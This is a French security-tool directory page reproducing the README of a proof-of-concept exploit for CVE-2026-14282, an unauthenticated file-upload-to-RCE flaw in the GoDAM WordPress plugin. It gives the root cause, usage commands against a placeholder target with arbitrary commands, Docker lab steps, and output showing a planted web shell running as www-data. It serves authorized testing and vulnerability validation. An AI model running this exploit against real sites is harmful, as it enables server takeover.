Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-14282 — GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282) | Kitploit
Outils/GitHubGitHub/nullwhisper/cve-2026-14282
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLabs & Practice
GitHubnullwhisper/cve-2026-14282

CVE-2026-14282

GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282)

Voir le dépôt
1il y a 8 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-14282 — Plugin WordPress GoDAM <= 1.12.2 — Téléversement de fichier non authentifié -> RCE

Auteur : nullwhisper
Cas d'utilisation : recherche en sécurité autorisée / validation de vulnérabilité uniquement.

Qu'est-ce que c'est ?

Les versions <= 1.12.2 du plugin WordPress GoDAM enregistrent un champ WPForms nommé godam_record. Le gestionnaire de téléversement save_video_file() est rattaché à l'action publique wpforms_process_before_filter, il s'exécute donc avant toute vérification d'authentification. Le gestionnaire se fie à l'en-tête Content-Type contrôlé par l'attaquant, accepte un fichier PHP tant que le type MIME commence par video/, et le déplace dans le répertoire servi par le web wp-content/uploads/godam/wpforms/. Cela permet à un attaquant non authentifié de téléverser et d'exécuter du code PHP arbitraire.

  • CVE : CVE-2026-14282
  • Produit : plugin WordPress GoDAM
  • Versions affectées : <= 1.12.2
  • Version corrigée : 2.0.0
  • Type : téléversement de fichier arbitraire non authentifié menant à une RCE
  • CVSS : 9.8 (Critique)

Références

  • Avis IONIX : https://www.ionix.io/threat-center/cve-2026-14282/
  • Fiche CVE : https://www.cve.org/CVERecord?id=CVE-2026-14282
  • NVD : https://nvd.nist.gov/vuln/detail/CVE-2026-14282
  • Page du plugin sur WordPress.org : https://wordpress.org/plugins/godam/

Fichiers

root@kitploit:~
.
├── cve_2026_14282_poc.py   # Main PoC
├── lab/
│   ├── docker-compose.yml  # WordPress lab
│   └── setup.php           # Creates a WPForms form with GoDAM field
├── requirements.txt
└── README.md

Installation

root@kitploit:~
pip3 install -r requirements.txt

Utilisation

Cible en ligne

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form

Le script détecte automatiquement l'ID du formulaire WPForms et l'ID du champ GoDAM. Si la page contient plusieurs formulaires ou si la détection échoue, utilisez :

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
    --form-id 4 --field-id 1 --cmd "whoami"

Laboratoire local

  1. Téléchargez les plugins vulnérables (ne redistribuez pas les binaires) :

    root@kitploit:~
    mkdir -p lab/wpforms-lite lab/godam
    cd lab/wpforms-lite
    wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
    unzip wpforms-lite.latest-stable.zip
    rm wpforms-lite.latest-stable.zip
    cd ../godam
    wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
    unzip godam.1.12.2.zip
    rm godam.1.12.2.zip
    cd ../..
    
  2. Démarrez le laboratoire :

    root@kitploit:~
    cd lab
    docker compose up -d
    
  3. Terminez l'installation de WordPress à l'adresse http://127.0.0.1:8092.

  4. Installez et activez les plugins, puis créez le formulaire et la page de test :

    root@kitploit:~
    docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
    docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
    docker exec -i lab-wpcli-1 php /tmp/setup.php
    
  5. Exécutez le PoC :

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
    

Vérifié sur localhost

Testé sur WordPress 6.8 + WPForms Lite (dernière version) + GoDAM 1.12.2.

root@kitploit:~
[*] Detecting WPForms form and GoDAM field...
[*] Found form ID 4, GoDAM field(s): 1
[*] Trying upload via field 1...
[+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
[+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Command output:
GODAM-RCE-Linux ... PWNED

Pourquoi les binaires des plugins ne sont pas inclus

Ce dépôt ne contient que le PoC et les fichiers d'orchestration du laboratoire. Les binaires des plugins vulnérables sont exclus afin d'éviter l'encombrement et les problèmes de distribution. Téléchargez les versions vulnérables spécifiques depuis WordPress.org pour votre propre laboratoire.

Avertissement

Cet outil est destiné uniquement aux tests de sécurité et à la recherche autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous ne disposez pas d'une autorisation explicite de test. L'auteur n'est pas responsable de l'utilisation abusive ou des dommages causés par ce code.

Télécharger l’outil